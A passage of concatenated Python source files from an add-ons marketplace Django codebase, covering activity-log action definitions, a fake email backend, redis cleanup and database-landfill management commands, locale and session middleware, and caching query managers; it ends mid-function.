class EDIT_VERSION(_LOG):
id = 17
action_class = 'edit'
format = _(u'{version} edited for {addon}.')
class DELETE_VERSION(_LOG):
id = 18
action_class = 'delete'
# Note, {0} is a string not a version since the version is deleted.
# L10n: {0} is the version number
format = _(u'Version {0} deleted from {addon}.')
keep = True
class ADD_FILE_TO_VERSION(_LOG):
id = 19
action_class = 'add'
format = _(u'File {0.name} added to {version} of {addon}.')
class DELETE_FILE_FROM_VERSION(_LOG):
"""
Expecting: addon, filename, version
Because the file is being deleted, filename and version
should be strings and not the object.
"""
id = 20
action_class = 'delete'
format = _(u'File {0} deleted from {version} of {addon}.')
class APPROVE_VERSION(_LOG):
id = 21
action_class = 'approve'
format = _(u'{addon} {version} approved.')
short = _(u'Approved')
keep = True
review_email_user = True
review_queue = True
class PRELIMINARY_VERSION(_LOG):
id = 42
action_class = 'approve'
format = _(u'{addon} {version} given preliminary review.')
short = _(u'Preliminarily approved')
keep = True
review_email_user = True
review_queue = True
class REJECT_VERSION(_LOG):
# takes add-on, version, reviewtype
id = 43
action_class = 'reject'
format = _(u'{addon} {version} rejected.')
short = _(u'Rejected')
keep = True
review_email_user = True
review_queue = True
class RETAIN_VERSION(_LOG):
# takes add-on, version, reviewtype
id = 22
format = _(u'{addon} {version} retained.')
short = _(u'Retained')
keep = True
review_email_user = True
review_queue = True
class ESCALATE_VERSION(_LOG):
# takes add-on, version, reviewtype
id = 23
format = _(u'{addon} {version} escalated.')
short = _(u'Escalated')
keep = True
review_email_user = True
review_queue = True
class REQUEST_VERSION(_LOG):
# takes add-on, version, reviewtype
id = 24
format = _(u'{addon} {version} review requested.')
short = _(u'Review requested')
keep = True
review_email_user = True
review_queue = True
class REQUEST_INFORMATION(_LOG):
id = 44
format = _(u'{addon} {version} more information requested.')
short = _(u'More information requested')
keep = True
review_email_user = True
review_queue = True
class REQUEST_SUPER_REVIEW(_LOG):
id = 45
format = _(u'{addon} {version} super review requested.')
short = _(u'Super review requested')
keep = True
review_queue = True
class COMMENT_VERSION(_LOG):
id = 49
format = _(u'Comment on {addon} {version}.')
short = _(u'Comment')
keep = True
review_queue = True
hide_developer = True
class ADD_TAG(_LOG):
id = 25
action_class = 'tag'
format = _(u'{tag} added to {addon}.')
class REMOVE_TAG(_LOG):
id = 26
action_class = 'tag'
format = _(u'{tag} removed from {addon}.')
class ADD_TO_COLLECTION(_LOG):
id = 27
action_class = 'collection'
format = _(u'{addon} added to {collection}.')
class REMOVE_FROM_COLLECTION(_LOG):
id = 28
action_class = 'collection'
format = _(u'{addon} removed from {collection}.')
class ADD_REVIEW(_LOG):
id = 29
action_class = 'review'
format = _(u'{review} for {addon} written.')
# TODO(davedash): Add these when we do the admin site
class ADD_RECOMMENDED_CATEGORY(_LOG):
id = 31
action_class = 'edit'
# L10n: {0} is a category name.
format = _(u'{addon} featured in {0}.')
class REMOVE_RECOMMENDED_CATEGORY(_LOG):
id = 32
action_class = 'edit'
# L10n: {0} is a category name.
format = _(u'{addon} no longer featured in {0}.')
class ADD_RECOMMENDED(_LOG):
id = 33
format = _(u'{addon} is now featured.')
keep = True
class REMOVE_RECOMMENDED(_LOG):
id = 34
format = _(u'{addon} is no longer featured.')
keep = True
class ADD_APPVERSION(_LOG):
id = 35
action_class = 'add'
# L10n: {0} is the application, {1} is the version of the app
format = _(u'{0} {1} added.')
class CHANGE_USER_WITH_ROLE(_LOG):
""" Expects: author.user, role, addon """
id = 36
# L10n: {0} is a user, {1} is their role
format = _(u'{0.name} role changed to {1} for {addon}.')
keep = True
class CHANGE_LICENSE(_LOG):
""" Expects: license, addon """
id = 37
action_class = 'edit'
format = _(u'{addon} is now licensed under {0.name}.')
class CHANGE_POLICY(_LOG):
id = 38
action_class = 'edit'
format = _(u'{addon} policy changed.')
class CHANGE_ICON(_LOG):
id = 39
action_class = 'edit'
format = _(u'{addon} icon changed.')
class APPROVE_REVIEW(_LOG):
id = 40
action_class = 'approve'
format = _(u'{review} for {addon} approved.')
editor_format = _(u'{user} approved {review} for {addon}.')
keep = True
editor_event = True
class DELETE_REVIEW(_LOG):
"""Requires review.id and add-on objects."""
id = 41
action_class = 'review'
format = _(u'Review {0} for {addon} deleted.')
editor_format = _(u'{user} deleted {0} for {addon}.')
keep = True
editor_event = True
class MAX_APPVERSION_UPDATED(_LOG):
id = 46
format = _(u'Application max version for {version} updated.')
class BULK_VALIDATION_EMAILED(_LOG):
id = 47
format = _(u'Authors emailed about compatibility of {version}.')
class BULK_VALIDATION_USER_EMAILED(_LOG):
id = 130
format = _(u'Email sent to Author about add-on compatibility.')
class CHANGE_PASSWORD(_LOG):
id = 48
format = _(u'Password changed.')
class MAKE_PREMIUM(_LOG):
id = 50
format = _(u'{addon} changed to premium.')
class MANIFEST_UPDATED(_LOG):
id = 52
format = _(u'{addon} manifest updated.')
class APPROVE_VERSION_WAITING(_LOG):
id = 53
action_class = 'approve'
format = _(u'{addon} {version} approved but waiting to be made public.')
short = _(u'Approved but waiting')
keep = True
review_email_user = True
review_queue = True
class PURCHASE_ADDON(_LOG):
id = 54
format = _(u'{addon} purchased.')
class INSTALL_ADDON(_LOG):
id = 55
format = _(u'{addon} installed.')
class REFUND_REQUESTED(_LOG):
id = 56
format = _(u'Refund requested for {addon}')
class REFUND_DECLINED(_LOG):
id = 57
format = _(u'Refund declined for {addon} for {0}.')
class REFUND_GRANTED(_LOG):
id = 58
format = _(u'Refund granted for {addon} for {0}.')
class REFUND_INSTANT(_LOG):
id = 59
format = _(u'Instant refund granted for {addon}.')
class USER_EDITED(_LOG):
id = 60
format = _(u'Account updated.')
class RECEIPT_CHECKED(_LOG):
id = 65
format = _(u'Valid receipt was checked for {addon}.')
class ESCALATION_CLEARED(_LOG):
id = 66
format = _(u'Escalation cleared for {addon}.')
short = _(u'Escalation cleared')
keep = True
review_queue = True
class APP_DISABLED(_LOG):
id = 67
format = _(u'{addon} disabled.')
short = _(u'App disabled')
keep = True
review_queue = True
class ESCALATED_HIGH_ABUSE(_LOG):
id = 68
format = _(u'{addon} escalated because of high number of abuse reports.')
short = _(u'High Abuse Reports')
keep = True
review_queue = True
class ESCALATED_HIGH_REFUNDS(_LOG):
id = 69
format = _(u'{addon} escalated because of high number of refund requests.')
short = _(u'High Refund Requests')
keep = True
review_queue = True
class REREVIEW_MANIFEST_CHANGE(_LOG):
id = 70
format = _(u'{addon} re-reviewed because of manifest change.')
short = _(u'Manifest Change')
keep = True
review_queue = True
class REREVIEW_PREMIUM_TYPE_UPGRADE(_LOG):
id = 71
format = _(u'{addon} re-reviewed because app upgraded premium type.')
short = _(u'Premium Type Upgrade')
keep = True
review_queue = True
class REREVIEW_CLEARED(_LOG):
id = 72
format = _(u'Re-review cleared for {addon}.')
short = _(u'Re-review cleared')
keep = True
review_queue = True
class ESCALATE_MANUAL(_LOG):
id = 73
format = _(u'{addon} escalated by reviewer.')
short = _(u'Reviewer escalation')
keep = True
review_queue = True
# TODO(robhudson): Escalation log for editor escalation..
class VIDEO_ERROR(_LOG):
id = 74
format = _(u'Video removed from {addon} because of a problem with '
'the video. ')
short = _(u'Video removed')
class REREVIEW_DEVICES_ADDED(_LOG):
id = 75
format = _(u'{addon} re-review because of new device(s) added.')
short = _(u'Device(s) Added')
keep = True
review_queue = True
class REVIEW_DEVICE_OVERRIDE(_LOG):
id = 76
format = _(u'{addon} device support manually changed by reviewer.')
short = _(u'Device(s) Changed by Reviewer')
keep = True
review_queue = True
class WEBAPP_RESUBMIT(_LOG):
id = 77
format = _(u'{addon} resubmitted for review.')
short = _(u'App Resubmission')
keep = True
review_queue = True
class ESCALATION_VIP_APP(_LOG):
id = 78
format = _(u'{addon} auto-escalated because its a VIP app.')
short = _(u'VIP auto-escalation')
keep = True
review_queue = True
class CUSTOM_TEXT(_LOG):
id = 98
format = '{0}'
class CUSTOM_HTML(_LOG):
id = 99
format = '{0}'
class OBJECT_ADDED(_LOG):
id = 100
format = _(u'Created: {0}.')
admin_event = True
class OBJECT_EDITED(_LOG):
id = 101
format = _(u'Edited field: {2} set to: {0}.')
admin_event = True
class OBJECT_DELETED(_LOG):
id = 102
format = _(u'Deleted: {1}.')
admin_event = True
class ADMIN_USER_EDITED(_LOG):
id = 103
format = _(u'User {user} edited, reason: {1}')
admin_event = True
class ADMIN_USER_ANONYMIZED(_LOG):
id = 104
format = _(u'User {user} anonymized.')
admin_event = True
class ADMIN_USER_RESTRICTED(_LOG):
id = 105
format = _(u'User {user} restricted.')
admin_event = True
class ADMIN_VIEWED_LOG(_LOG):
id = 106
format = _(u'Admin {0} viewed activity log for {user}.')
admin_event = True
class EDIT_REVIEW(_LOG):
id = 107
action_class = 'review'
format = _(u'{review} for {addon} updated.')
class THEME_REVIEW(_LOG):
id = 108
action_class = 'review'
format = _(u'{addon} reviewed.')
class GROUP_USER_ADDED(_LOG):
id = 120
action_class = 'access'
format = _(u'User {0.name} added to {group}.')
keep = True
admin_event = True
class GROUP_USER_REMOVED(_LOG):
id = 121
action_class = 'access'
format = _(u'User {0.name} removed from {group}.')
keep = True
admin_event = True
class REVIEW_FEATURES_OVERRIDE(_LOG):
id = 122
format = _(u'{addon} minimum requirements manually changed by reviewer.')
short = _(u'Requirements Changed by Reviewer')
keep = True
review_queue = True
class REREVIEW_FEATURES_CHANGED(_LOG):
id = 123
format = _(u'{addon} minimum requirements manually changed.')
short = _(u'Requirements Changed')
keep = True
review_queue = True
class CHANGE_VERSION_STATUS(_LOG):
id = 124
# L10n: {0} is the status
format = _(u'{version} status changed to {0}.')
keep = True
class DELETE_USER_LOOKUP(_LOG):
id = 125
# L10n: {0} is the status
format = _(u'User {0.name} {0.id} deleted via lookup tool.')
keep = True
class CONTENT_RATING_TO_ADULT(_LOG):
id = 126
format = _('{addon} content rating changed to Adult.')
review_queue = True
class CONTENT_RATING_CHANGED(_LOG):
id = 127
format = _('{addon} content rating changed.')
class PRIORITY_REVIEW_REQUESTED(_LOG):
id = 128
format = _(u'Priority review requested for {addon}.')
short = _(u'Priority Review')
keep = True
review_queue = True
LOGS = [x for x in vars().values()
if isclass(x) and issubclass(x, _LOG) and x != _LOG]
LOG_BY_ID = dict((l.id, l) for l in LOGS)
LOG = AttributeDict((l.__name__, l) for l in LOGS)
LOG_ADMINS = [l.id for l in LOGS if hasattr(l, 'admin_event')]
LOG_KEEP = [l.id for l in LOGS if hasattr(l, 'keep')]
LOG_EDITORS = [l.id for l in LOGS if hasattr(l, 'editor_event')]
LOG_REVIEW_QUEUE = [l.id for l in LOGS if hasattr(l, 'review_queue')]
# Is the user emailed the message?
LOG_REVIEW_EMAIL_USER = [l.id for l in LOGS if hasattr(l, 'review_email_user')]
# Logs *not* to show to the developer.
LOG_HIDE_DEVELOPER = [l.id for l in LOGS
if (getattr(l, 'hide_developer', False)
or l.id in LOG_ADMINS)]
def log(action, *args, **kw):
"""
e.g. amo.log(amo.LOG.CREATE_ADDON, []),
amo.log(amo.LOG.ADD_FILE_TO_VERSION, file, version)
"""
from access.models import Group
from addons.models import Addon
from amo import get_user, logger_log
from devhub.models import (ActivityLog, ActivityLogAttachment, AppLog,
CommentLog, GroupLog, UserLog, VersionLog)
from mkt.webapps.models import Webapp
from users.models import UserProfile
from versions.models import Version
user = kw.get('user', get_user())
if not user:
logger_log.warning('Activity log called with no user: %s' % action.id)
return
al = ActivityLog(user=user, action=action.id)
al.arguments = args
if 'details' in kw:
al.details = kw['details']
al.save()
if 'details' in kw and 'comments' in al.details:
CommentLog(comments=al.details['comments'], activity_log=al).save()
# TODO(davedash): post-remora this may not be necessary.
if 'created' in kw:
al.created = kw['created']
# Double save necessary since django resets the created date on save.
al.save()
if 'attachments' in kw:
formset = kw['attachments']
storage = get_storage_class()()
for form in formset:
data = form.cleaned_data
if 'attachment' in data:
attachment = data['attachment']
storage.save('%s/%s' % (settings.REVIEWER_ATTACHMENTS_PATH,
attachment.name), attachment)
ActivityLogAttachment(activity_log=al,
description=data['description'],
mimetype=attachment.content_type,
filepath=attachment.name).save()
for arg in args:
if isinstance(arg, tuple):
if arg[0] == Webapp:
AppLog(addon_id=arg[1], activity_log=al).save()
elif arg[0] == Version:
VersionLog(version_id=arg[1], activity_log=al).save()
elif arg[0] == UserProfile:
UserLog(user_id=arg[1], activity_log=al).save()
elif arg[0] == Group:
GroupLog(group_id=arg[1], activity_log=al).save()
# Webapp first since Webapp subclasses Addon.
if isinstance(arg, Webapp):
AppLog(addon=arg, activity_log=al).save()
elif isinstance(arg, Version):
VersionLog(version=arg, activity_log=al).save()
elif isinstance(arg, UserProfile):
# Index by any user who is mentioned as an argument.
UserLog(activity_log=al, user=arg).save()
elif isinstance(arg, Group):
GroupLog(group=arg, activity_log=al).save()
# Index by every user
UserLog(activity_log=al, user=user).save()
return al
########NEW FILE########
__FILENAME__ = mail
import logging
from django.core.mail.backends.base import BaseEmailBackend
from amo.models import FakeEmail
log = logging.getLogger('z.amo.mail')
class FakeEmailBackend(BaseEmailBackend):
"""
Used for development environments when we don't want to send out
real emails. This gets swapped in as the email backend when
`settings.SEND_REAL_EMAIL` is disabled.
"""
def send_messages(self, messages):
"""Sends a list of messages (saves `FakeEmail` objects)."""
log.debug('Sending fake mail.')
for msg in messages:
FakeEmail.objects.create(message=msg.message().as_string())
return len(messages)
def view_all(self):
"""Useful for displaying messages in admin panel."""
return (FakeEmail.objects.values_list('message', flat=True)
.order_by('-created'))
def clear(self):
return FakeEmail.objects.all().delete()
########NEW FILE########
__FILENAME__ = clean_redis
import logging
import os
import socket
import subprocess
import sys
import tempfile
import time
from django.core.management.base import BaseCommand
import redisutils
import redis as redislib
log = logging.getLogger('z.redis')
# We process the keys in chunks of size CHUNK.
CHUNK = 3000
# Remove any sets with less than MIN or more than MAX elements.
MIN = 10
MAX = 50
# Expire keys after EXPIRE seconds.
EXPIRE = 60 * 5
# Calling redis can raise raise these errors.
RedisError = redislib.RedisError, socket.error
def vacuum(master, slave):
def keys():
ks = slave.keys()
log.info('There are %s keys to clean up.' % len(ks))
ks = iter(ks)
while 1:
buffer = []
for _ in xrange(CHUNK):
try:
buffer.append(ks.next())
except StopIteration:
yield buffer
return
yield buffer
tmp = tempfile.NamedTemporaryFile(delete=False)
for ks in keys():
tmp.write('\n'.join(ks))
tmp.close()
# It's hard to get Python to clean up the memory from slave.keys(), so
# we'll let the OS do it. You have to pass sys.executable both as the
# thing to run and so argv[0] is set properly.
os.execl(sys.executable, sys.executable, sys.argv[0],
sys.argv[1], tmp.name)
def cleanup(master, slave, filename):
tmp = open(filename)
total = [1, 0]
p = subprocess.Popen(['wc', '-l', filename], stdout=subprocess.PIPE)
total[0] = int(p.communicate()[0].strip().split()[0])
def file_keys():
while 1:
buffer = []
for _ in xrange(CHUNK):
line = tmp.readline()
if line:
buffer.append(line.strip())
else:
yield buffer
return
yield buffer
num = 0
for ks in file_keys():
pipe = slave.pipeline()
for k in ks:
pipe.scard(k)
try:
drop = [k for k, size in zip(ks, pipe.execute())
if 0 < size < MIN or size > MAX]
except RedisError:
continue
num += len(ks)
percent = round(float(num) / total[0] * 100, 1) if total[0] else 0
total[1] += len(drop)
log.debug('[%s %.1f%%] Dropping %s keys.' % (num, percent, len(drop)))
pipe = master.pipeline()
for k in drop:
pipe.expire(k, EXPIRE)
try:
pipe.execute()
except RedisError:
continue
time.sleep(1) # Poor man's rate limiting.
if total[0]:
log.info('Dropped %s keys [%.1f%%].' %
(total[1], round(float(total[1]) / total[0] * 100, 1)))
class Command(BaseCommand):
help = "Clean up the redis used by cache machine."
def handle(self, *args, **kw):
try:
master = redisutils.connections['cache']
slave = redisutils.connections['cache_slave']
except Exception:
log.error('Could not connect to redis.', exc_info=True)
return
if args:
filename = args[0]
try:
cleanup(master, slave, filename)
finally:
os.unlink(filename)
else:
vacuum(master, slave)
########NEW FILE########
__FILENAME__ = extract_loc
import os
import re
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.management.base import BaseCommand
from amo.storage_utils import walk_storage
_loc_re = re.compile(r"""\\?(loc)\(.*?\)""", (re.M | re.S))
_exts = ('.py', '.html')
_root = settings.ROOT
_subs = tuple([os.path.join(_root, s) for s in ['mkt']])
class Command(BaseCommand):
"""
A very simple parser to find string marked with loc in py and html.
This is rather naive, so don't worry about it being perfect, it's just
so that we can find all the strings for the marketplace and pass them on
to UX people. Or you could do a fancy grep.
"""
def handle(self, *args, **options):
count = 0
for root, folders, files in walk_storage(_root):
if not root.startswith(_subs):
continue
for fname in files:
fname = os.path.join(root, fname)
if fname.endswith(_exts):
data = storage.open(fname).read()
found = False
for match in _loc_re.finditer(data):
if not found:
found = True
print fname
print '-' * len(fname)
print match.string[match.start():match.end()]
count += 1
if found:
print
print 'Strings found:', count
########NEW FILE########
__FILENAME__ = fix_charfields
import itertools
from django.core.management.base import BaseCommand
from django.db import models, connection
qn = connection.ops.quote_name
def fix(table_name, field):
d = {'table': table_name, 'field': qn(field.column), 'sql': sql(field)}
update = "UPDATE {table} SET {field}='' WHERE {field} IS NULL".format(**d)
alter = "MODIFY {sql}".format(**d)
return update, alter
def sql(field):
o = ['%s' % qn(field.column), field.db_type()]
if not field.null:
o.append('NOT NULL')
if field.primary_key:
o.append('PRIMARY KEY')
if field.default is not models.fields.NOT_PROVIDED:
o.append('default %r' % field.default)
return ' '.join(o)
class Command(BaseCommand):
help = 'Print SQL to change CharFields to be non-null.'
args = '[appname ...]'
def handle(self, *app_labels, **options):
if app_labels:
modules = [models.loading.get_app(app) for app in app_labels]
models_ = itertools.chain(*[models.loading.get_models(mod)
for mod in modules])
else:
models_ = models.loading.get_models()
updates, alters = [], []
for model in models_:
model_alters = []
table = model._meta.db_table
for field in model._meta.fields:
if isinstance(field, models.CharField) and not field.null:
update, alter = fix(table, field)
updates.append(update)
model_alters.append(alter)
if model_alters:
alters.append('ALTER TABLE %s\n\t%s' %
(table, ',\n\t'.join(model_alters)))
print ';\n'.join(updates + alters) + ';'
########NEW FILE########
__FILENAME__ = install_landfill
from datetime import date
from gzip import GzipFile
from optparse import make_option
import os
import shlex
from StringIO import StringIO
from subprocess import Popen, PIPE
import requests
from django.conf import settings
from django.core.management.base import BaseCommand
from zadmin.models import Config
class Command(BaseCommand):
help = """
Install a new landfill database. Requires that the database already exists.
Landfill destroys and remakes each table before putting data into it. This
is important to note as you'll have to rerun any migrations and you'll lose
any custom data you've loaded.
Requires that you have gzcat installed (default on most *nix).
"""
option_list = BaseCommand.option_list + (
make_option('--no-notice',
action='store_true',
dest='no_notice',
default=False,
help='Remove landfill site notice'),
make_option('--no-download',
action='store_true',
dest='no_download',
default=False,
help='Use already downloaded landfill file.'),
make_option('--no-save-file',
action='store_true',
dest='no_save_file',
default=False,
help='Do not save the file downloaded from allizom.'),
)
def handle(self, *args, **kw):
filename = date.today().strftime('landfill-%Y-%m-%d.sql.gz')
file_location = '/tmp/%s' % filename
file_url = 'https://landfill.addons.allizom.org/db_data/%s' % filename
write_dump = 'mysql -u%(db_user)s %(db_name)s' % {
'db_user': settings.DATABASES['default']['USER'],
'db_name': settings.DATABASES['default']['NAME'],
}
db_password = settings.DATABASES['default'].get('PASSWORD')
if db_password:
write_dump += ' -p%s' % db_password
if kw['no_download']:
if os.path.exists(file_location):
print('Skipping landfill download and using %s' % file_location)
landfill_file = GzipFile(filename=file_location,
mode='rb').read()
else:
print('No file for the current day')
print('expected: %s' % file_location)
return
else:
print('Downloading landfill file: %s' % file_url)
gzipped_file = requests.get(file_url, verify=False).content
landfill_file = GzipFile(
fileobj=StringIO(gzipped_file),
mode='rb').read()
if not kw['no_save_file']:
if os.path.exists(file_location):
print('File already exists not overwriting: %s' % file_location)
else:
with open(file_location, 'wb') as f:
print('Saving file to %s' % file_location)
f.write(gzipped_file)
print('Piping file into mysql.')
writer_process = Popen(
shlex.split(write_dump),
stdin=PIPE)
writer_process.communicate(input=landfill_file)
writer_process.wait()
if kw['no_notice']:
print('Removing landfile site notice.')
Config.objects.filter(key='site_notice').delete()
########NEW FILE########
__FILENAME__ = messages
from functools import partial
from django.contrib import messages as django_messages
import jinja2
from jingo import env
"""
This file was created because AMO wants to have multi-line messages including a
title and some content. Django's messages framework only takes a single string.
Importing this file should behave exactly like Django's messages framework
except it will take a 3rd argument as message content (the second is the message
title).
"""
def _make_message(title=None, message=None, title_safe=False,
message_safe=False):
c = {'title': title, 'message': message,
'title_safe': title_safe, 'message_safe': message_safe}
t = env.get_template('message_content.html').render(c)
return jinja2.Markup(t)
def _is_dupe(msg, request):
"""Returns whether a particular message is already cued for display."""
storage = django_messages.get_messages(request)
# If there are no messages stored, Django doesn't give us a proper storage
# object, so just bail early.
if not storage:
return False
try:
smsg = unicode(msg)
is_dupe = False
for message in storage:
if unicode(message) == smsg:
# We can't return from here because we need to tell Django not
# to consume the messages.
is_dupe = True
break
except (UnicodeDecodeError, UnicodeEncodeError):
return False
storage.used = False
return is_dupe
def _file_message(type_, request, title, message=None, extra_tags='',
fail_silently=False, title_safe=False, message_safe=False):
msg = _make_message(title, message, title_safe, message_safe)
# Don't save duplicates.
if _is_dupe(msg, request):
return
getattr(django_messages, type_)(request, msg, extra_tags, fail_silently)
debug = partial(_file_message, 'debug')
info = partial(_file_message, 'info')
success = partial(_file_message, 'success')
warning = partial(_file_message, 'warning')
error = partial(_file_message, 'error')
########NEW FILE########
__FILENAME__ = middleware
"""
Borrowed from: http://code.google.com/p/django-localeurl
Note: didn't make sense to use localeurl since we need to capture app as well
"""
import contextlib
import urllib
from django.conf import settings
from django.contrib.sessions.middleware import SessionMiddleware
from django.core.urlresolvers import is_valid_path
from django.http import (Http404, HttpResponseRedirect,
HttpResponsePermanentRedirect)
from django.middleware import common
from django.shortcuts import render
from django.utils.cache import patch_vary_headers, patch_cache_control
from django.utils.encoding import iri_to_uri, smart_str
import MySQLdb as mysql
import tower
import amo
from . import urlresolvers
from .helpers import urlparams
class LocaleAndAppURLMiddleware(object):
"""
1. search for locale first
2. see if there are acceptable apps
3. save those matched parameters in the request
4. strip them from the URL so we can do stuff
"""
def process_request(self, request):
# Find locale, app
prefixer = urlresolvers.Prefixer(request)
if settings.DEBUG:
redirect_type = HttpResponseRedirect
else:
redirect_type = HttpResponsePermanentRedirect
urlresolvers.set_url_prefix(prefixer)
full_path = prefixer.fix(prefixer.shortened_path)
# In mkt, don't vary headers on User-Agent.
with_app = False
if (prefixer.app == amo.MOBILE.short and
request.path.rstrip('/').endswith('/' + amo.MOBILE.short)):
# TODO: Eventually put MOBILE in RETIRED_APPS, but not yet.
return redirect_type(request.path.replace('/mobile', '/android'))
if 'lang' in request.GET:
# Blank out the locale so that we can set a new one. Remove lang
# from query params so we don't have an infinite loop.
prefixer.locale = ''
new_path = prefixer.fix(prefixer.shortened_path)
query = dict((smart_str(k), request.GET[k]) for k in request.GET)
query.pop('lang')
return redirect_type(urlparams(new_path, **query))
if full_path != request.path:
query_string = request.META.get('QUERY_STRING', '')
full_path = urllib.quote(full_path.encode('utf-8'))
if query_string:
full_path = "%s?%s" % (full_path, query_string)
response = redirect_type(full_path)
# Cache the redirect for a year.
if not settings.DEBUG:
patch_cache_control(response, max_age=60 * 60 * 24 * 365)
# Vary on Accept-Language or User-Agent if we changed the locale or
# app.
old_app = prefixer.app
old_locale = prefixer.locale
new_locale, new_app, _ = prefixer.split_path(full_path)
if old_locale != new_locale:
patch_vary_headers(response, ['Accept-Language'])
if with_app and old_app != new_app:
patch_vary_headers(response, ['User-Agent'])
return response
request.path_info = '/' + prefixer.shortened_path
tower.activate(prefixer.locale)
request.APP = amo.APPS.get(prefixer.app, amo.FIREFOX)
request.LANG = prefixer.locale
class NoVarySessionMiddleware(SessionMiddleware):
"""
SessionMiddleware sets Vary: Cookie anytime request.session is accessed.
request.session is accessed indirectly anytime request.user is touched.
We always touch request.user to see if the user is authenticated, so every
request would be sending vary, so we'd get no caching.
We skip the cache in Zeus if someone has an AMOv3 cookie, so varying on
Cookie at this level only hurts us.
"""
def process_request(self, request):
if not getattr(request, 'API', False):
super(NoVarySessionMiddleware, self).process_request(request)
def process_response(self, request, response):
if settings.READ_ONLY:
return response
# Let SessionMiddleware do its processing but prevent it from changing
# the Vary header.
vary = None
if hasattr(response, 'get'):
vary = response.get('Vary', None)
new_response = (super(NoVarySessionMiddleware, self)
.process_response(request, response))
if vary:
new_response['Vary'] = vary
else:
del new_response['Vary']
return new_response
class RemoveSlashMiddleware(object):
"""
Middleware that tries to remove a trailing slash if there was a 404.
If the response is a 404 because url resolution failed, we'll look for a
better url without a trailing slash.
"""
def process_response(self, request, response):
if (response.status_code == 404
and request.path_info.endswith('/')
and not is_valid_path(request.path_info)
and is_valid_path(request.path_info[:-1])):
# Use request.path because we munged app/locale in path_info.
newurl = request.path[:-1]
if request.GET:
with safe_query_string(request):
newurl += '?' + request.META.get('QUERY_STRING', '')
return HttpResponsePermanentRedirect(newurl)
else:
return response
@contextlib.contextmanager
def safe_query_string(request):
"""
Turn the QUERY_STRING into a unicode- and ascii-safe string.
We need unicode so it can be combined with a reversed URL, but it has to be
ascii to go in a Location header. iri_to_uri seems like a good compromise.
"""
qs = request.META.get('QUERY_STRING', '')
try:
request.META['QUERY_STRING'] = iri_to_uri(qs)
yield
finally:
request.META['QUERY_STRING'] = qs
class CommonMiddleware(common.CommonMiddleware):
def process_request(self, request):
with safe_query_string(request):
return super(CommonMiddleware, self).process_request(request)
class ReadOnlyMiddleware(object):
def process_request(self, request):
if request.method == 'POST':
return render(request, 'amo/read-only.html', status=503)
def process_exception(self, request, exception):
if isinstance(exception, mysql.OperationalError):
return render(request, 'amo/read-only.html', status=503)
class ViewMiddleware(object):
def get_name(self, view_func):
# Find a function name or used the class based view class name.
if not hasattr(view_func, '__name__'):
name = view_func.__class__.__name__
else:
name = view_func.__name__
return '%s.%s' % (view_func.__module__, name)
class NoAddonsMiddleware(ViewMiddleware):
"""
If enabled will try and stop any requests to addons by 404'ing them.
Here there be dragons. Fortunately this is temporary right?
"""
def process_view(self, request, view_func, view_args, view_kwargs):
name = self.get_name(view_func)
if name.startswith(settings.NO_ADDONS_MODULES):
raise Http404
########NEW FILE########
__FILENAME__ = models
import contextlib
import threading
from django.conf import settings
from django.db import models, transaction
from django.utils import encoding, translation
import caching.base
import multidb.pinning
import queryset_transform
from . import signals # Needed to set up url prefix signals.
_locals = threading.local()
_locals.skip_cache = False
@contextlib.contextmanager
def use_master():
"""Within this context, all queries go to the master."""
old = getattr(multidb.pinning._locals, 'pinned', False)
multidb.pinning.pin_this_thread()
try:
yield
finally:
multidb.pinning._locals.pinned = old
@contextlib.contextmanager
def skip_cache():
"""Within this context, no queries come from cache."""
old = getattr(_locals, 'skip_cache', False)
_locals.skip_cache = True
try:
yield
finally:
_locals.skip_cache = old
# This is sadly a copy and paste of annotate to get around this
# ticket http://code.djangoproject.com/ticket/14707
def annotate(self, *args, **kwargs):
for arg in args:
if arg.default_alias in kwargs:
raise ValueError("The %s named annotation conflicts with the "
"default name for another annotation."
% arg.default_alias)
kwargs[arg.default_alias] = arg
obj = self._clone()
obj._setup_aggregate_query(kwargs.keys())
# Add the aggregates to the query
for (alias, aggregate_expr) in kwargs.items():
obj.query.add_aggregate(aggregate_expr, self.model, alias,
is_summary=False)
return obj
models.query.QuerySet.annotate = annotate
class TransformQuerySet(queryset_transform.TransformQuerySet):
def pop_transforms(self):
qs = self._clone()
transforms = qs._transform_fns
qs._transform_fns = []
return transforms, qs
def no_transforms(self):
return self.pop_transforms()[1]
def only_translations(self):
"""Remove all transforms except translations."""
from translations import transformer
# Add an extra select so these are cached separately.
return (self.no_transforms().extra(select={'_only_trans': 1})
.transform(transformer.get_trans))
def transform(self, fn):
from . import decorators
f = decorators.skip_cache(fn)
return super(TransformQuerySet, self).transform(f)
class RawQuerySet(models.query.RawQuerySet):
"""A RawQuerySet with __len__."""
def __init__(self, *args, **kw):
super(RawQuerySet, self).__init__(*args, **kw)
self._result_cache = None
def __iter__(self):
if self._result_cache is None:
self._result_cache = list(super(RawQuerySet, self).__iter__())
return iter(self._result_cache)
def __len__(self):
return len(list(self.__iter__()))
class CachingRawQuerySet(RawQuerySet, caching.base.CachingRawQuerySet):
"""A RawQuerySet with __len__ and caching."""
# Make TransformQuerySet one of CachingQuerySet's parents so that we can do
# transforms on objects and then get them cached.
CachingQuerySet = caching.base.CachingQuerySet
CachingQuerySet.__bases__ = (TransformQuerySet,) + CachingQuerySet.__bases__
class UncachedManagerBase(models.Manager):
def get_query_set(self):
qs = self._with_translations(TransformQuerySet(self.model))
return qs
def _with_translations(self, qs):
from translations import transformer
# Since we're attaching translations to the object, we need to stick
# the locale in the query so objects aren't shared across locales.
if hasattr(self.model._meta, 'translated_fields'):
lang = translation.get_language()
qs = qs.transform(transformer.get_trans)
qs = qs.extra(where=['"%s"="%s"' % (lang, lang)])
return qs
def transform(self, fn):
return self.all().transform(fn)
def raw(self, raw_query, params=None, *args, **kwargs):
return RawQuerySet(raw_query, self.model, params=params,
using=self._db, *args, **kwargs)
def safer_get_or_create(self, defaults=None, **kw):
"""
This is subjective, but I don't trust get_or_create until #13906
gets fixed. It's probably fine, but this makes me happy for the moment
and solved a get_or_create we've had in the past.
"""
with transaction.commit_on_success():
try:
return self.get(**kw), False
except self.model.DoesNotExist:
if defaults is not None:
kw.update(defaults)
return self.create(**kw), True
class ManagerBase(caching.base.CachingManager, UncachedManagerBase):
"""
Base for all managers in AMO.
Returns TransformQuerySets from the queryset_transform project.
If a model has translated fields, they'll be attached through a transform
function.
"""
def get_queryset(self):
qs = super(ManagerBase, self).get_queryset()
if getattr(_locals, 'skip_cache', False):
qs = qs.no_cache()
return self._with_translations(qs)
def raw(self, raw_query, params=None, *args, **kwargs):
return CachingRawQuerySet(raw_query, self.model, params=params,
